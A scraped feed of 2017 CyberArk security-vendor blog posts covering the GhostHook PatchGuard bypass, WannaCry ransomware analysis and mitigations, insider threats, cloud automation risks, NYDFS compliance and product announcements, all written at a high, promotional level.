Today on CyberArk’s Threat Research Blog, CyberArk Labs has published details about a new attack technique that bypasses PatchGuard in Windows OS. For our business readers, we offer this executive summary with highlights of the potential security impact:

Up until now, we haven’t seen many successful rootkits on Windows 10 64-bit, thanks in large part to PatchGuard (Kernel Patch Protection). Research by CyberArk Labs has uncovered an attack technique called GhostHook in the Windows OS that can let an attacker bypass PatchGuard, making it easy for an attacker to gain rootkit abilities on Windows x64 OS machines. This attack technique gives cyber attackers full control over the network including the ability to intercept anything on the system.

More than 400 million devices worldwide currently run on Windows 10. GhostHook is the first attack technique identified that will bypass PatchGuard – giving attackers the ability to take full control over 64-bit systems at the kernel level.

Attackers will now be able to go completely unnoticed by all security measures that rely on retrieving reliable information from the OS Kernel – this includes AV, personal firewalls, HIPS, and many next-gen endpoint products.

Attackers can now easily bury a rootkit in the kernel – completely undetectable to security solutions and invisible to MSFT’s PatchGuard itself. This attack technique could also lead to the proliferation of more sophisticated, 64-bit malware – typically used in APT campaigns by nation states.

Of note, 64-bit malware currently makes up less than 1% of the current threat landscape. 64-bit malware includes Shamoon, the disk-wiping malware used on Saudi Aramco, and Flame. Both examples are country-grade espionage malware.

Please read the original post for the full technical details and Microsoft’s response to the reported vulnerability.

]]>
CyberArk Customer Spotlight: Texas A&M University, College of Architecture https://www.cyberark.com/blog/cyberark-customer-spotlight-texas-m-university-college-architecture/ Fri, 16 Jun 2017 15:00:14 +0000 https://www.cyberark.com/blog//

In this CyberArk Customer Spotlight video, we speak with Laura Melton, Senior Information Technology Associate at Texas A&M University College of Architecture, about the importance of removing local administrator rights to strengthen endpoint security.

By deploying CyberArk Endpoint Privilege Manager, the university has reduced privileges and minimized risks of information being stolen or encrypted by ransomware – all without impacting user and helpdesk productivity. With the CyberArk solution, a combination of least privilege security and application control reduces the risk of malware infection. Unknown applications run in a restricted mode to contain threats and behavioral analysis blocks credential theft attempts, while giving IT administrators enhanced visibility.

To learn more about applying least privilege at the endpoint to keep employees productive without compromising security, download our free eBook, Achieving Protection and Productivity by Securing Privilege on the Endpoint

 
]]>
The Everyday Insider Threat https://www.cyberark.com/blog/everyday-insider-threat/ Wed, 14 Jun 2017 12:30:51 +0000 https://www.cyberark.com/blog//

If you’ve ever worked in an office, you know that you can’t access any data you want. Some files are locked away from the everyday employee: out of sight and out of mind. Whether it’s your boss’ bonus, private emails between colleagues, company financials, performance reviews or information about yet-to-be-launched products and services, access to information is limited.

A lot of people are quite comfortable with this. However, a new survey we carried out found that over half (52%) of UK office workers would access sensitive company data if they knew they wouldn’t get caught. In fact, far from being a moral issue, one in five (21%) cited a lack of technical skills as holding them back from attacking their employer.

So, what could tempt employees into accessing company information?

The survey revealed a mix of motives, from wanting to make sure they were being rewarded fairly, to having suspicions the company was unethical or corrupt, to straightforward curiosity and office gossip. What was clear, though, is that very unhappy employees are twice as likely to want to spy on company information than their happier peers.

While disgruntled or angry employees only account for 26% of insider attacks, according to Forrester[i], they are the source of some of the most costly and difficult attacks to detect. The 2016 Sage Group data breach is just one example of an employee using an internal login to steal company data, temporarily rocking the reputation of the company and, indeed, its share price.

How should employers stop malicious insiders in their tracks?

First, we should recognise that most respondents weren’t out to deliberately cause the company harm. The majority simply wanted to get their hands on information about themselves and engage in idle gossip; just 2% said they would be prepared to sell information to competitors for financial gain or to blackmail their boss.

The basic rule in defending against malicious insiders is to address the threat, not the individual. Privileged access – not people – is the true insider threat. The process of securing privileged accounts should be on-going with continuous evaluation and adjustments to improve security as the business and threat landscape changes.

To effectively protect against insider threats, organisations should minimise user privileges to reduce the attack surface, lock down privileged credentials, and control and monitor privileged accounts, which are consistently targeted by insider attackers.

The threat from outside…..

While this survey highlights the potential mischief that employees can get up to without proper access controls, it’s also an important reminder of the threat that cyber attackers posing as insiders could pose.

If more than half of everyday workers would be prepared to access sensitive data, it’s not hard to imagine the damage a cybercriminal with advanced skills and malicious intentions could cause. They have no loyalty to the company and are more likely to be driven by financial or political motives over innocent curiosity.

Security teams have long known that one of the most effective ways for attackers to access sensitive data is to masquerade as a legitimate insider – using existing privileged credentials to achieve broad, unfettered access to a company’s most valuable assets. With cyber skills advancing all the time, and cybercriminals hiding behind valid credentials to avoid being caught, companies must be more alert than ever to stop unwanted insiders in their tracks and protect their most valuable information.

[i] “Understand The State Of Data Security And Privacy: 2015 To 2016”, Forrester Research, Inc., January 8, 2016

]]>
Does Cloud Automation Create New Vulnerabilities for the Enterprise? https://www.cyberark.com/blog/cloud-automation-create-new-vulnerabilities-enterprise/ Tue, 06 Jun 2017 19:04:45 +0000 https://www.cyberark.com/blog//

While cloud automation can help organizations become significantly more agile and improve security, it can also expand the enterprise attack surface, creating new vulnerabilities and risks in what becomes an increasingly dynamic and complex environment. It’s important to understand and address the vulnerabilities that can come with automation.

Organizations have many different reasons and roadmaps for their migration to the cloud. While some have an “all-in” strategy, most migrate to the cloud over time, moving individual business activities and applications as needed. Automation needs vary based on the enterprises cloud strategy and drivers.

Common Drivers for Cloud Adoption

Three of the most common drivers for cloud adoption include cost savings and efficiency, access to on-demand computing, and increased agility.

To achieve cost savings, some enterprises take a “forklift approach” and simply move their apps from their on-premises data center to the cloud – and shut their data centers. In this scenario the enterprise does not take full advantage of the dynamic capabilities offered by cloud computing, and consequently, requires only minimal automation. To achieve much greater efficiency, organizations need to re-architect and replace applications, rather than simply move them. This agility requires a high level of automation, which is noted in the third scenario below.

It’s increasingly common that enterprises want access to on-demand computing. This provides rapid access to significant computing capacity, such as for big data and analytics. To achieve this, application instances are created instantly to meet the demands of the business. It’s automation that makes this possible, assigning and securing the required credentials and privileges when each new instance is created.

The third scenario is all about agility — enabling the enterprise to more rapidly develop and deploy applications to better support customers and evolving market needs. As development practices such as Continuous Integration, Continuous Delivery (CI/CD) pipelines, and DevOps are adopted, developers also leverage orchestration and automation tools to speed software development and deployment. Enterprises with robust CI/CD pipelines may do multiple and potentially dozens of code deployments each day using automated processes and tools. Clearly, automation is critical in this scenario.

Potential Vulnerabilities Expand With Automation

Across each of these scenarios, the level of automation required increases. It’s important to understand some of the core vulnerabilities and risks that need to be addressed to protect an organization’s cloud environment.

Regardless of the primary driver for cloud adoption or the level of automation, every organization needs to protect privileged accounts and credentials and access rights for their cloud management consoles.  The consoles are very powerful, and they are used by both humans and automated scripts. Consequently, the console is vulnerable to phishing attacks and is a common entry point for attackers. Additionally, all organizations will need to secure the privileged credentials used to manage the enterprise’s cloud-based infrastructure, including the operating system, database and other resources, as well as any embedded static application credentials.

With on-demand computing, there are additional vulnerabilities to protect. These include, for example, any dynamically assigned application credentials, API keys, and cloud secrets as well as the privileged credentials established when new application instances are created with auto scaling or other orchestration tools. When each new instance is created with auto scaling, it will need privileges to access other applications and resources, and this access must be automatically secured.

In the market agility scenario, not only must the vulnerabilities and risks described in the earlier examples be protected, but also the privileged credentials and secrets associated with the CI/CD pipeline, including all the administrative consoles for orchestration and other tools. And the trust relationships must be fully automated by automatically storing, retrieving and managing secrets and credentials across the pipeline.

In summary, as the level of automation increases, the vulnerabilities and attack surface also increases. Consequently it is important that organizations are aware of and defend against the vulnerabilities that can come with automation.

At CyberArk we’re focused on solutions to secure the privileged accounts and credentials required to manage the enterprise’s cloud and automation environments. For example, we’ve integrated CyberArk with orchestration and other tools to support automated trust relationships, and we’re focused on meeting the needs of development teams and DevOps with CyberArk Conjur.

No matter where you are in your enterprise’s cloud journey or the level of automation you are using, you will need to implement robust privileged account security policies to protect your cloud assets. For additional information visit www.cyberark.com/cloud.

 

]]>
WannaCry Deconstructed: Five Ways to Mitigate Ransomware Risks https://www.cyberark.com/blog/wannacry-deconstructed-five-ways-mitigate-ransomware-risks/ Tue, 30 May 2017 15:47:18 +0000 https://www.cyberark.com/blog//

Since launching on May 12, the WannaCry ransomware has made headlines around the world after infecting more than 230,000 systems across 150 countries. It’s captured the attention of the security community-at-large as the most notable strain of ransomware with worm capabilities, which enables it to automatically self-replicate to other nodes on the network. As a result, infection has spread at a speed and scale never achieved before. The ransomware attacks did not discriminate against organizational size or industry – many well-known companies were impacted including Dacia, FedEx, Nissan, Cambrian College, Renault, PetroChina and Shaheen Air. Thousands of ATMs and ticketing machines were also targeted and encrypted.

As our CyberArk Labs team recently outlined, WannaCry itself is a fairly common strain of ransomware. The propagation techniques used to spread the infection are what truly set it apart. WannaCry uses a nation state-grade infection vector — a Microsoft SMB vulnerability dubbed “EternalBlue”— that makes it exceptionally viral and its resulting propagation, exponential.

The ransomware encrypts the infected user’s files — from photos and videos to documents and databases. The now-infamous red ransomware note is then displayed, demanding approximately $300-$600 via Bitcoin payment in order to recover the files.

Five Best Practices to Mitigate Risk

Though WannaCry is in the spotlight today, ransomware will continue to evolve, and more advanced techniques will find their way into attackers’ playbooks. So what can organizations do to protect against WannaCry and other forms of ransomware that will undoubtedly emerge in the future? Here are five best practices to follow to mitigate risk:

  1. Always Backup: Whether you’re attacked by a new, exotic strain of ransomware, or your hard drive suddenly dies unexpectedly, backing up your important data is an important, table-stakes best practice. But remember — backups alone are not enough to protect against data loss from ransomware attacks, especially if organizations are exposing privileged credentials to attackers.
  2. Follow the Least Privilege Principle: Always configure access controls including file, directory and network sharing permissions with the least privilege principle in mind. Most users do not need admin privileges to do their required jobs on their corporate endpoint devices, so user access should remain at the minimal level that will allow normal functioning. While running as a non-privileged user does not make you immune to WannaCry ransomware, it can prevent the malware from carrying out certain malicious tasks, such as deleting shadow copies of the infected system’s files.
  3. Apply Application Control: Controlling which executables have access to your files can also contribute to defensive efforts. For example, if you put the PowerPoint executable in a whitelist as the only executable that has write access to your presentation files, then if a ransomware’s executable tries to encrypt and overwrite the files, it will be denied (as it is not on the “approved” whitelist). It’s important to also establish policies based on trusts that will protect these “trusted” or whitelisted applications.
  4. Disable SMB v1 and Apply Patches: To protect against the specific WannaCry strain, immediately disable the outdated Microsoft SMB protocol version 1 or simply apply the patch MS17-010 that Microsoft released a few months ago.
  5. Block Internet Access: The Microsoft SMB protocol is meant to be internal, so your network should not be open to SMB packets from the internet. Implementing port filtering to block all versions of SMB at the network boundary is also an important preventative measure.

As we advised in the wake of the initial attacks, organizations should immediately implement a combination of least privilege and application control policies on endpoints and servers throughout their organizations to mitigate risk. This can help prevent ransomware from maliciously encrypting files and deleting the snapshots that are often needed to fully recover from an infection. This is an essential layer in defending against future ransomware attacks.

]]>
The Case for Comprehensive Access Management https://www.cyberark.com/blog/case-comprehensive-access-management/ Fri, 26 May 2017 14:08:20 +0000 https://www.cyberark.com/blog//

The insider threat does not necessarily cease when an employee leaves the organization. There are plenty of recent articles in the news with cautionary tales of ex-employees compromising company networks.

  • A former employee at a private security patrol company was ordered by court to pay more than $300,000 to fix computer systems he damaged after he was fired.
  • A former employee of an engineering company stole $425,000 worth of proprietary information for a competitor.
  • A high level IT employee of a sportswear company was accused of setting up a phony account to create a back door to the company’s networks before leaving for another job, and using it to steal information.

Organizations typically have policies and procedures in place to change credentials and terminate access to systems and technology when an employee departs the company. The process should be the same whether the employee is in the IT department or not. How access is terminated depends upon the organization and IT infrastructure.

When all access to various systems is managed in a single directory, such as Active Directory, the solution can be straightforward. Things get complicated when the infrastructure is more complex with a wide variety of systems, multiple directories, cloud-based applications, etc. If there isn’t a dedicated procedure for what to do in case of IT member termination, then there is a chance that some access may be left open.

Outdated accounts are typically left open until someone finds out (usually someone from the IT/Security team) and only then is the access terminated. Ideally, all privileged accounts are managed and monitored via a privileged account security solution, and all identities are verified using multi-factor authentication before access is granted.

The actions of malicious IT staff makes headlines, but keep in mind they are not the only ones with privilege. All access is a privilege and should be managed throughout the employment lifecycle, from onboarding of the employee through termination. Even employees outside of IT with routine access privileges pose a risk (malicious or accidental) if those privileges are not managed carefully. Think about it – HR has access to employee information, sales has access to customer data, marketing has access to public facing communication channels etc.

Access creep

Employee roles and responsibilities are often fluid, and workers tend to accumulate privileges over time. Jobs change and situations arise that require one-time access to resources. Passwords shared for one-time access often are not invalidated or changed after they are used.

Although managing credentials and securing access to data or systems is often considered to be an IT function, typically the permissions and privileges are granted by supervisors or account administrators who do not keep IT or the human resources department in the loop. Furthermore, employees may have access to systems that IT isn’t aware of, such as a file-sharing program, marketing database etc.

HR usually handles the administrative tasks of a termination and relies on IT to deprovision privileged access. But in many cases, neither has an authoritative list of all accounts, privileges and credentials accumulated over the course of employment. As a result, it is possible for employees to retain access to networks and resources after leaving an organization, creating a new flavor of an insider threat.

Best practices

As with many aspects of security, comprehensive access management depends upon both policy and technology.

Because IT departments often do not authorize and assign all system access, a complete access management program has to extend beyond IT to all departments in the organization. This includes all supervisors and managers who grant access to systems or information to their direct reports, and information owners who are responsible for access to data, which is often the ultimate target of an intrusion. Policies should define how and when access is granted, establish programs to track all access, and actively manage that access so that privileges are revoked when they’re no longer needed.

Furthermore, organizations must actively protect and monitor for all types of privileged credentials. The CyberArk Privileged Account Security Solution allows organizations to protect credentials, manage accounts and monitor activity by privileged users. When integrated with enterprise directories or identity and access management solutions, privileged access can automatically be terminated when users leave. Continuous monitoring can help spot the creation of backdoors or other suspect activity while the accounts are active.

With a comprehensive program in place – one that aligns policies, practices and technology – organizations can ensure that all access to privileged accounted are secured and managed.

]]>
CyberArk Labs: Breaking Down WannaCry Ransomware – What’s Different? https://www.cyberark.com/blog/cyberark-labs-breaking-wannacry-ransomware-whats-different/ Mon, 15 May 2017 16:46:32 +0000 https://www.cyberark.com/blog//

Critical Synopsis:

  • WannaCry malware continues to spread on a global basis and organizations are still at risk of being infected;
  • Patching the Microsoft vulnerability can prevent infection via the SMB worm, but cannot prevent direct infection via phishing;
  • CyberArk Labs tested prevention tactics on WannaCry over the weekend and found that the combination of enforcing least privilege on endpoints and application greylisting control was 100 percent effective in preventing WannaCryptor from encrypting files.

The ransomware behind this attack is known as WannaCryptor, also referred to as WannaCrypt or WannaCry. Over the weekend, CyberArk Labs investigated the ransomware strain, broke down the attack vectors, and analyzed how it compares to other recent ransomware attacks. Here’s what organizations need to know now.

To date, CyberArk Labs has tested more than 600,000 ransomware samples – including WannaCryptor – in order to better understand common infection, encryption and removal characteristics.  Unlike previous strains of ransomware, WannaCryptor is differentiated by a worm that spreads the ransomware as quickly as possible to as many machines as possible. The worm spreads using the “eternalblue” SMB vulnerability in Microsoft systems.

Microsoft issued a patch for this vulnerability in March 2017, but details on the vulnerability were released into the wild, freely available to attackers, as part of the Shadow Brokers leaks. Any individual and organization with an unpatched Microsoft system remains vulnerable to the worm in WannaCryptor.

  • Important Protection Note: The Microsoft patch will prevent infection via the SMB worm, but it cannot prevent infection and file encryption if the ransomware is delivered through a direct means, such as phishing.

WannaCryptor is able to execute on an infected machine without administrative privileges. However, to propagate through the organization’s network, WannaCryptor needs to escalate privileges through a Microsoft vulnerability that enables it run code in SYSTEM user context. WannaCryptor is able to operate in an offline environment, encrypting the user’s files with an RSA-2048 key pair. After the encryption process, the ransomware demands $300-$600 in bitcoin to decrypt the files.

While the built-in worm differentiates WannaCryptor’s ability to spread from previous versions of ransomware, there is nothing inherently unique about its encryption and extortion techniques. Like most ransomware, WannaCryptor was missed by traditional anti-virus solutions.

  • Important Protection Note: Organizations should immediately implement a combination of least privilege and application control policies on endpoints and servers throughout their organizations.

This proactive approach is not dependent on the ability to detect advanced malware; instead, it treats all unknown applications as potentially suspicious and protects information accordingly. This prevents one infected end-point from causing an organizational pandemic.

When tested in the CyberArk Lab, the combination of least privilege and application greylisting controls proved 100 percent effective in preventing WannaCryptor and dozens of other ransomware families from encrypting files.

This attack should serve as a reminder that back-ups alone are no longer enough to protect against data loss, especially if organizations are exposing privileged credentials to attackers. This means organizations may have to choose between complete data loss and paying the ransom. Eliminating the attacker’s ability to access administrative credentials to propagate ransomware beyond the initially compromised machine is an essential action to defend against future ransomware attacks and limit damage.

]]>
Conjur Named a “Cool Vendor” in DevOps by Gartner https://www.cyberark.com/blog/conjur-named-a-cool-vendor-in-devops-by-gartner/ Thu, 11 May 2017 14:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-named-a-cool-vendor-in-devops-by-gartner/  

Newton, MA – May 9th, 2017 – Conjur, a leading enterprise secrets management provider for the modern era of clouds, containers, and DevOps, today announced that it has been designated as a “Cool Vendor” based on the May 2017 “Cool Vendors in DevOps, 2017” report published by leading analyst firm Gartner, Inc. The report states that “This year’s Cool Vendors recognize that the scope of DevOps tools must evolve and innovate. In many enterprises, growth in DevOps adoption is frenetic, fueled by rising business demands for speed and agility.”

This frenetic growth frequently leaves security as an afterthought. An earlier Gartner report entitled “Top 10 Strategic Technology Trends for 2017: Adaptive Security Architecture” (March 2017) highlights the importance of security in DevOps. The report states that “a Gartner survey in mid-2016 found that 50% of enterprises would be using DevOps by the end of 2016.” It continues, “However, we estimate that fewer than 20% of enterprise security architects have engaged to systematically incorporate information security into their organizations’ DevOps initiatives. Fewer still have achieved the high degrees of security automation required to qualify as DevSecOps.”

Conjur’s platform addresses this specific gap and helps customers move to a true DevSecOps delivery model. This is driven by Conjur’s unique blend of enterprise-grade capabilities and its ability to provide total automation for security and secrets workflows, resulting in the delivery of “security as code.”

“The market annually looks forward to the listing of Cool Vendors, and we are honored to be selected for what we believe is a rarefied distinction”, said Elizabeth Lawler, founder and CEO of Conjur. “At Conjur we have always had passion and belief that we are solving an important and difficult problem in an elegant manner. We feel this is a tremendous external validation about our market, our approach, and our firm from Gartner, a globally trusted name in the market.”

The report is available to Gartner clients for download at https://www.gartner.com/document/3706719

About Conjur

Conjur delivers an enterprise secrets management platform that enables organizations to balance their goal of adopting cloud computing with their need to ensure security. Conjur automates machine identity provisioning, authorization of privileged access, service account control, and machine-to-machine connectivity in a way that meets the needs of all DevSecOps stakeholders. Conjur is headquartered in Newton, Mass., and is backed by Amplify Partners, Avalon Partners, and Koa Labs. For more information, please visit www.conjur.com or follow @conjurinc on Twitter.

Gartner Disclaimer

Gartner does not endorse any vendor, product or service depicted in our research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

###
Media Contact:
Ranjeet Vidwans
rvidwans@conjur.net
+1-617-329-4625

 

]]>
New York State Gets Bullish on Cyber Security Programs https://www.cyberark.com/blog/new-york-state-gets-bullish-cyber-security-programs/ Tue, 09 May 2017 15:24:37 +0000 https://www.cyberark.com/blog//

Last year, New York experienced an unprecedented number of data breaches triggered by hacking, malicious insiders and accidental causes according to the attorney general.  Coincidentally, in late September of 2016, the New York State Department of Financial Services (NYDFS) proposed 23 NYCRR 500, a regulation requiring banks, insurers and other financial service providers to improve their organizational cyber-readiness through the establishment of programs and policies that protect sensitive electronic data.

Effective as of March 1, 2017, the regulation appears to be in direct response to the ongoing cyber attacks that target an organization’s most critical systems containing intellectual property, consumer data and other sensitive information. The number of companies that fall into exemption from this regulation is very limited and any other organization regulated by the NYDFS will now be required to create programs protecting sensitive data held either by the organization itself or by a third-party provider.

In short, the regulation requires that each company calculate a risk profile unique to the organization, develop programs and policies that specifically address that profile and establish a minimum security standard to maintain compliance. The program should be designed to protect the confidentiality, integrity and availability of the organization’s information systems.

Key elements from 23 NYCRR 500:

  1. Establish a comprehensive cyber security program
  2. Create written cyber security policies
  3. Appoint a Chief Information Security Officer (CISO)
  4. Provide cyber security training to personnel
  5. Establish policies and procedures for third parties
  6. Detect, alert and respond to cyber security threats
  7. Include an audit trail for cyber security events

Privileged Account Security and Why It’s Important to 23 NYCRR 500 

Privileged accounts are used to gain access to critical systems such as servers, switches, firewalls, financial trading systems and other applications that are crucial to the business.  Unprotected, these accounts represent a significant security vulnerability. Cyber attackers target privileged accounts to move laterally, escalate privileges and ultimately navigate a company’s entire IT infrastructure, often undetected for months. According to Mandiant’s M-Trends 2017 Report, threat groups specifically within the financial sector have advanced the tools and approaches they use to gain access to privileged accounts, escalate privileges and maintain persistence.

Attackers are becoming smarter and more sophisticated. Using traditional security controls may not be enough to protect your environment. The pathway attackers use continues to evolve as more organizations shift to next-gen workloads for cloud, mobile, Internet of Things (IoT), etc.  Organizations need to prioritize locking down their privileged accounts to better protect against, detect and respond to cyber attacks before critical systems are breached and sensitive data becomes compromised.

Securing your privileged accounts with CyberArk solutions will satisfy nearly all of the key elements of this regulation including risk assessments, cyber security programs and policies, penetration testing and vulnerability assessments, audit trail, access privileges, application security – all the way through training and monitoring. Much of 23 NYCRR 500 requires organizations to properly assess risk to their security gaps, detect and respond to cyber threats that exist within their IT infrastructure. This is exactly what we strive to deliver to our customers through our integrated portfolio of solutions.

See How CyberArk Can Help You Start Tracking Compliance

The strict requirements of regulation 23 NYCRR 500 place a substantial burden on every financial services organization regulated by the New York State Department of Financial Services. With CyberArk at the core of your cyber security programs and policies, you can start tracking compliance with a single solution designed to protect your most critical assets in public, private or hybrid cloud environments.

Learn how CyberArk can protect the confidentiality, integrity and availability of your information systems. Attend our webinar on Thursday June 22, at 2:00 PM EST for a review of the key sections in this regulation and more information about how CyberArk solutions can help to support your organization’s compliance with 23 NYCRR 500.

]]>
Cloud Automation Capabilities for Rapidly Securing Cloud Assets https://www.cyberark.com/blog/cloud-automation-capabilities-rapidly-securing-cloud-assets/ Thu, 04 May 2017 14:10:04 +0000 https://www.cyberark.com/blog//

The Urgency of Rapidly Securing Cloud Assets

As organizations increasingly work to leverage cloud based infrastructure, we see increased attacks and exploits of the vulnerabilities in cloud-based infrastructure. Vulnerable privileged accounts for cloud- based infrastructure all too often make these attacks particularly damaging. Consider, for example, the recent actions of determined hackers against FlexiSpy.

Organizations recognize that protecting their cloud assets is a responsibility they share with their cloud vendors.  As organizations work to secure their applications and other sensitive assets in the cloud, they want the same robust security capabilities they’ve had in their on-premises environments. And they want a solution from a leading vendor that they trust to protect their keys to the IT kingdom.

With the dynamic nature and fast pace of cloud deployments and innovation, security, IT and DevOps leaders not only want the most secure, scalable and comprehensive privileged account security solution, but also the convenience and flexibility of rapid deployment into their cloud environments.  They basically want robust security for the cloud now!

Deploying CyberArk in as Little as 15 Minutes

Using the new CyberArk cloud automation capabilities, organizations can, in as little as 15 minutes, automatically deploy and establish a complete CyberArk Privileged Account Security solution in their AWS environment. The CyberArk solution established by the automation tools includes the CyberArk Enterprise Password Vault®, CyberArk Privileged Session Manager®, CyberArk SSH Key Manager™ and a disaster recovery (DR) vault. With these new cloud automation capabilities, organizations are able to quickly have CyberArk solutions available, running on AWS, and ready for administrators to start securing the cloud assets.

The CyberArk solution runs on AWS and is designed to provide the same unparalleled, robust security and protection for privileged account and credentials that CyberArk offers with on-premises deployments – in fact it’s the same proven solution, just automated for deployment on AWS.

Leveraging AWS Best Practices

The cloud automation capabilities include CyberArk AMIs (Amazon Machine Images) and take advantage of AWS CloudFormation templates to automate the deployment of CyberArk solutions. CloudFormation is designed to give developers and systems administrators an easy way to create, manage and provision a collection of related AWS resources.

Importantly, the CyberArk architecture leverages AWS privileged account security best practices, including separate AWS Availability Zones for the primary and DR vaults. It is designed to ensure that the vaults are both independent from each other and also independent from the cloud assets secured.

Of course there are important prerequisites. First, you will need a valid CyberArk license and an AWS account. You will also need to set up the pre-configured AWS environment to prepare for the automated deployment of the CyberArk solution. This includes AWS VPCs (Virtual Private Clouds), private and public subnets, and Security Groups. Fortunately, to make it easier, an additional CloudFormation template is available from CyberArk to automate the set up and configuration of the AWS environment.

Other Cloud Solutions

We’re excited to offer these new cloud automation capabilities to facilitate deployments of CyberArk solutions for cloud customers. These new capabilities are in addition to our other security capabilities designed specifically for AWS, which include an integration with Amazon Inspector and CyberArk DNA to simplify discovery and prioritization of privileged account risk, enhanced AWS Access Key protection, and an integration with the AWS Security Token Service to allow secure single sign-on to the AWS Management Console. CyberArk also supports and works with other leading cloud vendors.

If you plan to attend the CyberArk Impact 2017 customer event in Italy later this month, you can learn more in the session lead by a Senior Solution Architect from AWS. Additional information about how to use CyberArk to secure privileged accounts and credentials in AWS is also available on our website.

]]>
Insiders and the Privileged Pathway of Attacks https://www.cyberark.com/blog/insiders-privileged-pathway-attacks/ Tue, 25 Apr 2017 17:02:13 +0000 https://www.cyberark.com/blog//

Corroborating the recent surge in headlines, a new industry study reveals that 56 percent of security professionals surveyed say insider threat incidents have become more frequent in the past 12 months.

As we’ve covered in previous posts, insiders present a particularly challenging security conundrum. Those who gain access to privileged credentials can initiate seemingly legitimate privileged user sessions. Take, for example, reports of a former IT director at a sportswear company who created a privileged, unauthorized backdoor account that provided him access to the corporate network for nearly two years after he left the company.

Though insiders may have a variety of motives, the attack pathway they follow is similar. The first step in carrying out an insider attack is to gain inside access. This image shows the typical path attackers follow to complete their mission.

Without the automated real-time detection and alerting on risky activities within privileged sessions, an inside attacker may operate undetected for long periods of time.

In order to block insider attacks, it’s critical to first block the privileged pathway that leads to your organization’s most sensitive assets and information. CyberArk’s comprehensive solution for privileged account security offers proactive controls to reduce the risk of intentional and unintentional insider threats, as well as real-time monitoring and threat analytics to aid in detection of unauthorized accounts and in-progress attacks.

Here’s a look at how the CyberArk solution works at each critical step of the privileged pathway to control and monitor privileged accounts to minimize the risk of insider threats.

Learn more about how CyberArk can help you protect against the growing insider threat, and download our free eBook, The Danger Within: Unmasking Insider Threats.

 

 

 

]]>
Q&A: Three Reasons I Chose to Become a Conjur Advisor https://www.cyberark.com/blog/qa-three-reasons-i-chose-to-become-a-conjur-advisor/ Tue, 25 Apr 2017 15:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/qa-three-reasons-i-chose-to-become-a-conjur-advisor/  

Correy Voo has known Conjur for several years and recently became an advisor to the company. His distinguished career includes senior technology leadership roles at global telecommunications and global financial services firms, chairing industry groups, and advising a number of innovative startups. He is currently Chief Technology Officer at Showt.

We recently had a chance to chat with Correy regarding his involvement with Conjur.

Conjur: Correy, thanks for your advice and support to-date, and for taking a few minutes for this chat. Please tell us a bit about your background.

Correy: I’ve been in roles at the intersection of business and technology for most of my career. I started out in consulting with BT, where I ultimately became the CTO and Chief Architect. Then I went to Bank of America for several years in a similar CTO / Chief Architect capacity and then spent a few years at UBS as Platform Services CTO / Group CTO where I had various responsibilities such as setting the technology strategy for Bank wide technology services. In those roles, I was always exposed to interesting startups and upon leaving UBS I decided to focus my energies on working with startups more closely and more formally, and on starting up my own technology firms as well.

How Did You Connect with Conjur?

Whilst at UBS, I was in the Boston area for business and was invited by our Wealth Management division to attend a client dinner engagement for the Boston Tech / Financial Services community that Elizabeth (Lawler, Founder and CEO of Conjur) was also attending. We got to chatting about Conjur and what it was offering in the area of Next-Generation Privileged Access Management (PAM) and that was the nexus for an ongoing dialogue regarding market dynamics, product strategy, and so on. Those conversations started to become more frequent, and at some point it just made sense that I formally sign on as an advisor.

Why Did You Decide to Work With Conjur?

I saw that the firms I worked with and the startups that were vying for their business were still solving problems for the “old world”. Conjur was unique in several ways that intrigued me regarding a very forward-looking view of where the world was going in terms of utility computing and automation, and specifically how to maintain the necessary levels of controls when using these new technology options.

Firstly, Automation. Conjur provides the first solution to market that is focused on solving the PAM problem for DevOps. If you look at the development and direction that technology is evolving in – Machine learning, AI, automation, robotics, etc. – it involves less and less participation from humans. All the PAM solutions to-date are designed to be human-centric and in the new world, the human is typically the bottleneck. Conjur is built for new word — If an application or machine is asking for access, so long as it’s within policy, can be granted without human involvement in a secure, controlled and policy assured manner which is still in keeping with the need to protect and defend critical assets and processes.

Secondly, Ease of Use – Conjur is built for business and DevOps to help them address security and compliance demands in a rapidly evolving and highly flexible set of operational conditions. The incumbents are all built with the security admin in mind as the target user. What’s needed today is a solution that allows business users to apply security to the right things for the right reasons using policy. Conjur is a business tool that manages security, rather than a security tool per se – it fits well into the new world operating models and processes that are being used to run modern businesses. Conjur is a tool for modern Business Technology, not legacy boundary controls.

Most importantly, Conjur is built for the Cloud and other modern infrastructure, and application, technologies. All industries that have developed reliance upon infrastructure and application technologies will continue to evolve and doing so, will continue to exploit more effective technology solutions such as Machine Identity, IoT, and M2M computing at significant scale. Everyone has been trying to get current PAM solutions like CyberArk and the like to work in the new world – cloud, containers, utility computing – and finding that they are not suitable – old world practices just do not work with modern, boundary-less, agile solutions. Companies trying to control applications and services in external cloud systems like AWS and Azure the same way they controlled their traditional data centers are struggling. Most medium and large organizations are living in a hybrid reality where they’ve still got a significant legacy data center footprint, lots of new cloud-based infrastructure, and there are more new technologies, architectures etc coming down the road. Companies need to be able to apply common policy controls across an increasingly fragmented and evolving set of services and infrastructures from a common control framework that still addresses the corporate risks. Conjur is the only system available that had the practical functionality to support this hybrid current-state moving to future-state.

Where Would You Like to See Conjur Evolve?

In terms of where the technology is today, I think Conjur and it’s customers and prospects have a significant opportunity to deploy the technology as a migration platform to help get customers move off of legacy IT and onto modern IT platforms. Conjur has the ability to reach into the old world and help pull companies forward to the new services by applying a uniform set of policies across all.

As far as what the future holds, I’d like to see Conjur put machine learning into the product so that humans can be further removed from the day-to-day repetitive tasks of policy management, enforcement and governance – once the fundamental principles have been configured into the master policy console. This will allow users to start with static rules that are initially manually defined and then use the system to learn more about how the environment is actually operating based on those rules and how things are being added / changed etc. It would be interesting to have dynamism built into the platform so that it’s constantly learning and growing through inference and experience so that it is able to self-govern based upon a set of master policies which are described as business rules

Any Parting Thoughts?

As a long time technology geek, it is always good to see a small company take an idea and cause waves in a traditional domain, constantly challenging the status quo in a market that has a lot of outdated, legacy, ideas and companies. I’m enjoying helping Conjur punch way above it’s size — as evidenced by your traction in terms of customer wins, partner engagements, and traction with the analyst community. 

]]>
New Wave of Ransomware Could Put Utilities at Risk https://www.cyberark.com/blog/new-wave-ransomware-put-utilities-risk/ Tue, 18 Apr 2017 20:59:45 +0000 https://www.cyberark.com/blog//

The stakes for protecting against ransomware are about to get higher as malicious tools evolve to target Industrial Control Systems (ICS) and threaten critical infrastructure.

